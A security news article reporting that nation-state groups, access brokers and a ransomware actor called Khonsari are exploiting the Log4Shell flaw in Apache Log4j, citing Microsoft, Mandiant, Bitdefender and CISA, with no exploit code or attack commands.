Log4j vulnerability now used by state-backed hackers, access brokers

As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging library.

Also known as Log4Shell, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.

All hackers switch to Log4Shell

Among the first threat actors to leverage Log4Shell to drop payloads are cryptocurrency mining groups and botnets, who started to attack immediately after the proof-of-concept exploit code became available.

In a report on Sunday, Microsoft Threat Intelligence Center (MSTIC) observed the critical Log4j bug being exploited to drop Cobalt Strike beacons, which could indicate that more menacing actors were at play since the payload is often part of network breaches.

MSTIC updated the report on Tuesday to add that it detected nation-state activity using Log4Shell, sometimes in active attacks. The researchers tracked groups “groups originating from China, Iran, North Korea, and Turkey.”

One of the actors is the Iranian threat group Phosphorus - also tracked as Charming Kitten, APT 35, who Microsoft observed “acquiring and making modifications” to the Log4Shell exploit.

Unlike most APT groups operating these days, Charming Kitten also has a history of ransomware attacks, mainly to disrupt operations rather than cash in, along with cyberespionage activity.

Another nation-state threat actor taking advantage of the Log4Shell bug is Hafnium, a hacking group linked to China.

The adversary became more broadly known after exploiting the ProxyLogon zero-day vulnerabilities in Microsoft Exchange Server in the period between the bugs were reported and a patch became available.

Microsoft says that Hafnium is now using Log4Shell in attacks against virtualization infrastructure “to extend their typical targeting

According to the researchers, the systems that Hafnium used in these attacks were using a DNS service that is normally seen in testing activity to fingerprint machines.

Cybersecurity firm Mandiant has confirmed that Chinese and Iranian state actors are using the Log4j vulnerability in attacks and is expecting that other groups to be doing the same or be in a preparation stage.

John Hultquist, VP of Intelligence Analysis at Mandiant, told BleepingComputer that adversaries will waste no time creating persistence on targeted networks for future development of the attack.

While the report from MSTIC also mentions state-backed hacking groups from North Korea and Turkey, the researchers did not offer any information on how these actors leveraged Log4Shell.

Ransomware attacks to be expected

Apart from nation-state actors, Microsoft has confirmed that brokers providing initial network access to various groups, mostly financially motivated have also started to exploit the Log4j flaw.

Initial access brokers typically work with ransomware-as-a-service (RaaS) operations, to which they sell access to compromised company networks.

Log4Shell has already been used in a ransomware attack from a new actor named Khonsari, a report from Bitdefender shows.

Based on available information, Khonsari may be used to wipe data instead of encrypting it because its ransom note includes contact details for a Louisiana antique shop owner instead of the attacker.

It is no surprise that Log4Shell has attracted hackers of all sorts. The bug has a maximum severity score and can be exploited remotely without authentication to take full control of a vulnerable system. Furthermore, the vulnerable Log4j library is included in products from dozens of vendors.

Given the damage this bug can cause, the Cybersecurity Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems immediately.